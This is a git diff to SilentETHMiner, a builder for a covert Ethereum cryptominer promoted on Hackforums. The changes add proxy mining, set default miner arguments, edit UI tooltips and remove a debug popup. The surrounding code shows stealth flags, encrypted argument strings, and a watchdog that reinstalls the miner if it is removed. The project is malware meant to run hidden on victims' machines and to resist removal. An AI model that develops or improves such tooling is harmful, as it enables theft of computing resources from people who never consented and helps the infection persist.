diff --git a/README.md b/README.md
index 1b7a417..94e23ba 100644
--- a/README.md
+++ b/README.md
@@ -1,7 +1,7 @@
-# SilentETHMiner v1.0 - Based on Lime Miner v0.3
+# SilentETHMiner v1.0.1 - Based on Lime Miner v0.3
## Main Features
@@ -39,6 +39,8 @@ So the requirements are as follow:
## Changes
+# v1.0.1 (20/03/2021)
+* Added support for proxy mining
# v1.0 (20/03/2021)
* Inital release
diff --git a/SilentETHMiner/Form1.Designer.vb b/SilentETHMiner/Form1.Designer.vb
index ff1cdde..a022627 100644
--- a/SilentETHMiner/Form1.Designer.vb
+++ b/SilentETHMiner/Form1.Designer.vb
@@ -153,7 +153,7 @@ Partial Class Form1
Me.MephForm1.Size = New System.Drawing.Size(535, 272)
Me.MephForm1.SubHeader = "By Unam Sanctam, Credit to NYAN-x-CAT"
Me.MephForm1.TabIndex = 0
- Me.MephForm1.Text = "Silent ETH Miner Builder 1.0"
+ Me.MephForm1.Text = "Silent ETH Miner Builder 1.0.1"
'
'MephTabcontrol2
'
@@ -430,7 +430,7 @@ Partial Class Form1
Me.txtPoolScheme.FormattingEnabled = True
Me.txtPoolScheme.ItemHeight = 16
Me.txtPoolScheme.ItemHighlightColor = System.Drawing.Color.FromArgb(CType(CType(55, Byte), Integer), CType(CType(55, Byte), Integer), CType(CType(55, Byte), Integer))
- Me.txtPoolScheme.Items.AddRange(New Object() {"stratum (Standard)", "stratums (SSL/TLS)", "stratumss (SSL/TLS 1.2)"})
+ Me.txtPoolScheme.Items.AddRange(New Object() {"stratum (Standard)", "stratums (SSL/TLS)", "stratumss (SSL/TLS 1.2)", "http (getwork, proxy)"})
Me.txtPoolScheme.Location = New System.Drawing.Point(8, 56)
Me.txtPoolScheme.Margin = New System.Windows.Forms.Padding(2)
Me.txtPoolScheme.Name = "txtPoolScheme"
@@ -1055,8 +1055,7 @@ Partial Class Form1
Me.Label25.Size = New System.Drawing.Size(13, 13)
Me.Label25.TabIndex = 54
Me.Label25.Text = "?"
- Me.TooltipHelper.SetToolTip(Me.Label25, "If enabled the miner will pause when the computer is active and resume when no ke" &
- "yboard and mouse input has been detected for the ""Idle Wait"" amount of minutes.")
+ Me.TooltipHelper.SetToolTip(Me.Label25, "The amount of minutes to wait before starting Idle mode.")
'
'Label24
'
@@ -1161,7 +1160,8 @@ Partial Class Form1
Me.Label15.Size = New System.Drawing.Size(13, 13)
Me.Label15.TabIndex = 39
Me.Label15.Text = "?"
- Me.TooltipHelper.SetToolTip(Me.Label15, resources.GetString("Label15.ToolTip"))
+ Me.TooltipHelper.SetToolTip(Me.Label15, "If enabled the miner will pause when the computer is active and resume when no ke" &
+ "yboard and mouse input has been detected for the ""Idle Wait"" amount of minutes.")
'
'Label11
'
diff --git a/SilentETHMiner/Form1.resx b/SilentETHMiner/Form1.resx
index b303d69..e043970 100644
--- a/SilentETHMiner/Form1.resx
+++ b/SilentETHMiner/Form1.resx
@@ -126,9 +126,6 @@
343, 17
-
- If enabled the miner will use the normal "Max CPU" amount while the computer is in use and will start using the "Idle CPU" amount when no keyboard and mouse input has been detected for the "Idle Wait" amount of minutes.
-
Starts a separate program that monitors the miner to see if it's still running and located in the installed path. If it's not running or missing it will start and copy the miner back to the install location.
diff --git a/SilentETHMiner/Form1.vb b/SilentETHMiner/Form1.vb
index 8e747b5..a3ae6a7 100644
--- a/SilentETHMiner/Form1.vb
+++ b/SilentETHMiner/Form1.vb
@@ -4,7 +4,7 @@ Imports System.Text
Public Class Form1
Public Shared rand As New Random()
- Public advancedParams As String = ""
+ Public advancedParams As String = " --response-timeout=30 --farm-retries=30 "
Public watchdogdata As Byte() = New Byte() {}
'Silent ETH Miner by Unam Sanctam https://github.com/UnamSanctam/SilentETHMiner, based on Lime Miner by NYAN CAT https://github.com/NYAN-x-CAT/Lime-Miner
@@ -20,7 +20,7 @@ Public Class Form1
Private Sub BackgroundWorker1_DoWork(sender As Object, e As System.ComponentModel.DoWorkEventArgs) Handles BackgroundWorker1.DoWork
Try
- MephForm1.Text = "Silent ETH Miner Builder 1.0"
+ MephForm1.Text = "Silent ETH Miner Builder 1.0.1"
Catch ex As Exception
End Try
@@ -105,7 +105,6 @@ Public Class Form1
argstr += " --unam-stealth "
End If
- MessageBox.Show(argstr)
minerbuilder.Replace("#ARGSTR", EncryptString(argstr))
If chkInstall.Checked Then
@@ -392,7 +391,7 @@ Public Class Form1
End Sub
Private Sub labelHackforums_LinkClicked(sender As Object, e As LinkLabelLinkClickedEventArgs) Handles labelHackforums.LinkClicked
- Process.Start("https://hackforums.net/showthread.php?tid=5995773")
+ Process.Start("https://hackforums.net/showthread.php?tid=6145468")
End Sub
Private Sub chkAdvanced_CheckedChanged(sender As Object) Handles chkAdvanced.CheckedChanged